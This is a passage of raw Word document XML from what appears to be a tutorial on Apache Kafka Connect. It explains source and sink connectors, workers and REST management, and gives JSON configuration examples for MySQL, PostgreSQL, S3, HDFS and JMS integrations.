          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B787B2D"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7B319DC"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llows the use of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hema Management</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174CB175"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works closely with </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kafka Schema Registry</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, allowing you to manage and enforce schemas when importing and exporting data to/from Kafka topics. This provides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validation</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74409DF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e Integration with External Systems</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF8B2A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omes with built-in connectors for many popular systems, including:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78EA3A7B"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e.g., PostgreSQL, MySQL, Oracle) through JDBC source and sink connectors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD2791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oud storage</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., Amazon S3, Google Cloud Storage) through S3 sink connectors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417C63A9"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ake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NoSQL systems</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., HDFS, MongoDB) via dedicated connectors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C08315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e.g., reading files from local file systems or cloud storage).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4159ECD6"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and Streaming Data Integration</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31DFAEDA"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handle both </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>batch</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reaming</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> data flows. Source connectors can ingest batch data from databases, while sink connectors can stream the data into external systems like data warehouses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D43A441"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afka Connect:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5701414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ata Pipelines</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66314D5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 and High Availability</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500DB3A7"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tensibility</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB21BE9"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extensible. It allows for the development of custom connectors, either for source or sink integrations. This makes it easy to integrate Kafka with almost any external system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE57956"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Operational Overhead</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706C9ADA"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Configuration and Management</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180CA642"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REST APIs for managing connector configurations, which allows easy integration with external monitoring, configuration management, and automation systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3852FF27"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313587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upports </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>message transformations</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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JDBC Source Connector</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE9CC6B"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et’s consider a scenario where we want to stream data from a MySQL database into a Kafka topic. Here is how we can configure the Kafka Connect JDBC Source Connector:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2053DE0B"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 Kafka Connect JDBC Connector</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7A162D" w14:textId="77777777" w:rsidR="00D57CED" w:rsidRPr="0003272F" w:rsidRDefault="00D57CED" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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irst, ensure that the Kafka Connect JDBC Connector is installed. It is available as part of the </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Confluent Hub</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or can be manually downloaded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B18F72"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e the Source Connector</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D8CCB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833AE67"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1B68F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53A3FCF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552CB6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F5A6A4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3AAC42D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D8D2784"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2B31E4F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342ACFC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697291A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B4BD8D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1000"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CA8A0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101DBA7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F86EFC5"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to be used (in this case, JdbcSourceConnector).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A94D87"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ion.url</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The JDBC URL to connect to the MySQL database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381022A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menting.column.name</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Defines the column to track new records (e.g., id).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0DA4F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refix</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A prefix to add to Kafka topics. In this case, all data from the MySQL database will be written to Kafka topics starting with mysql-.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7DE108" w14:textId="77777777" w:rsidR="00D57CED" w:rsidRPr="0003272F" w:rsidRDefault="00D57CED" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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 the Connector</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142ED92F" w14:textId="77777777" w:rsidR="00D57CED" w:rsidRPr="0003272F" w:rsidRDefault="00D57CED" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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 the Kafka Connect REST API to deploy this configuration. Once deployed, the connector will start reading data from the mydb MySQL database and pushing it to Kafka topics prefixed with mysql-.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644E9B6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Sink Connector (To Write Data to S3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AD2C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imilarly, we can use Kafka Connect to stream data from Kafka topics to Amazon S3 by using the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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C89EE1A"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2802AA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49F0D58E"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373D8BB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4F25D13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78D8B7E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2D13C8E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6B0DF67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11B428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value.converter": "org.apache.kafka.connect.storage.StringConverter",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477B683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6459058D"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636E5B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3166741"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class (S3SinkConnector).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D840C0B"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3.bucket.name</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Specifies the S3 bucket name where the data will be stored.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCEDD42"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ush.size</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Determines the number of records to accumulate before flushing data to S3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640B0FF4"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77001D3"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a powerful framework that simplifies the integration of Kafka with external systems. It offers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F02AAA2"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by running in distributed mode.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6458DE6B"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ide range of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for popular systems (databases, cloud storage, file systems).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40599958"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ability to perform </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>streaming and batch data processing</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in a reliable and fault-tolerant way.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485CA314" w14:textId="77777777" w:rsidR="00D57CED" w:rsidRPr="00CE4B95" w:rsidRDefault="00D57CED" w:rsidP="0003272F">
      <w:pPr>
        <w:ind w:left="360"/>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Kafka Connect abstracts much of the complexity involved in building custom integration solutions, making it easier to integrate Kafka with external systems for real-time data processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3566B2" w14:textId="346E206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412" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB1BA7D" w14:textId="69916CB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0" w:name="_Toc197868064"/>
      <w:r w:rsidRPr="00CE4B95">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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="850"/>
    </w:p>
    <w:p w14:paraId="041814A9" w14:textId="369398A4" w:rsidR="00105620" w:rsidRPr="0003272F" w:rsidRDefault="00105620"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Easy Integration Between Kafka and External Systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ADD598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robust, scalable, and fault-tolerant framework that enables easy integration betwee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and a variety of </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>external systems</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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Connect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03250B8A"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Kafka Connect can scale horizontally by running multiple worker nodes, either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single nod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multiple nodes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3851B3"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Connect provides a fault-tolerant mechanism by replicating data across different workers, ensuring that the system remains operational even in the event of a failure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA30C14"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luggable Architecture</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Kafka Connect uses </w:t>
      </w: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xml:space="preserve"> to integrate Kafka with external systems. These connectors can be easily plugged into Kafka Connect, and custom connectors can be developed for new systems or custom use cases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00135A20"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Connect is designed to handle high throughput, enabling it to deal with large-scale data transfers without overwhelming the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01751EAC"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T API</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka Connect exposes a REST API that allows users to manage connectors, configurations, and tasks without direct interaction with the underlying code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052663F0"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Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD498D7"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These are responsible for connecting Kafka to external systems. There are two types of connectors:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F8442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Pull data from external systems (e.g., a database) into Kafka topics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395BBA90"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Push data from Kafka topics to external systems (e.g., databases, HDFS, message queues).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F110A7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asks</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Each connector can spawn one or more tasks. A task is the unit of work that handles a specific partition of the data. Kafka Connect can scale by distributing these tasks across multiple workers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BCC57F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Kafka Connect workers run connectors and tasks. They can run in:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09588B69"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For simple, single-node setups.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E8F05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For large-scale, multi-node setups. This mode allows tasks to be distributed across multiple workers for better scalability and fault tolerance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17593876"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Kafka Connect uses JSON configuration files to specify settings like connection details, task distribution, and data formatting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D7CE33"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Use Cases and Integration Examples</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760E515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ntegrating Kafka with Databases (e.g., MySQL, PostgreSQL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287FA53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JDBC-based </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Sour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nk</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> connectors to stream data from databases into Kafka topics and vice versa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F18911"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 (Database to Kafka)</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ource connector</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be used to pull data from a relational database (e.g., MySQL) and stream it into Kafka topics. It supports both </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>incrementa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ull-table</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> data loads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24242E7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MySQL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B17442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69F4DF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87F9C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2290BBF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2586BD6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3D1D02B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1CFF033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E2A7CA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EFC738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75E7B9C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55CE33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29B72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    "poll.interval.ms": "1000"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0090C5A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CFB1F3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8EA27E6"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 (Kafka to Database)</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ink connector</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can push data from Kafka topics into a database like PostgreSQL or Oracle. This is useful for data warehousing or populating a data store.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A09857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PostgreSQL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A51D0B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FC0D5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postgresql-sink-connector",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DC7A1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1C454BC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inkConnector",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2979EA3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51A10C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sql-source-topic",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1403486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postgresql://localhost:5432/mydb",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFCD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6A96AF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1D841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sert.mode": "insert",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5042AC5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auto.create": "true"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DA4B7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598CEC9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E5E3694"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Integrating Kafka with HDFS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6082B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w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HDFS Sink Connector</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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HDFS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7241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64891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hdfs-sink-connector",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F4D54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3A74F1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hdfs.HdfsSinkConnector",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74925C6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DEFD20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6459450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hdfs.url": "hdfs://namenode:8020",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBB4D9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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9C0DA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rotate.interval.ms": "60000",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C43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dir": "kafka",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02446E8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e.url": "hdfs://namenode:8020",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1651D9E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ink.partitioner.class": "io.confluent.connect.storage.partitioner.FieldPartitioner",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2197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field.name": "date",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCEF7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er.class": "io.confluent.connect.storage.partitioner.DatePartitioner"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF4A83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6E622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5C7084D"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tegrating Kafka with External Message Queues (e.g., JMS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9676F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integrate with external message queues like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Java Message Service) via </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JMS Source and Sink Connectors</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. These connectors allow you to read messages from JMS queues/topics and send them to Kafka or push Kafka messages to JMS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5EF1D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a JMS source connector:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276FC4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5C4F54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jms-source-connector",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7003120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40D70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ms.JmsSourceConnector",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132D3315"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80D637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url": "tcp://localhost:61616",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44AE17A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queue.name": "my-jms-queue",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CE8E2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topic": "my-kafka-topic",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40304D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5000"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18107D5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A584C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7E421D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4. Integrating Kafka with Cloud Storage (e.g., Amazon S3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F2CA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has a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 xml:space="preserve"> to export Kafka topics into </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
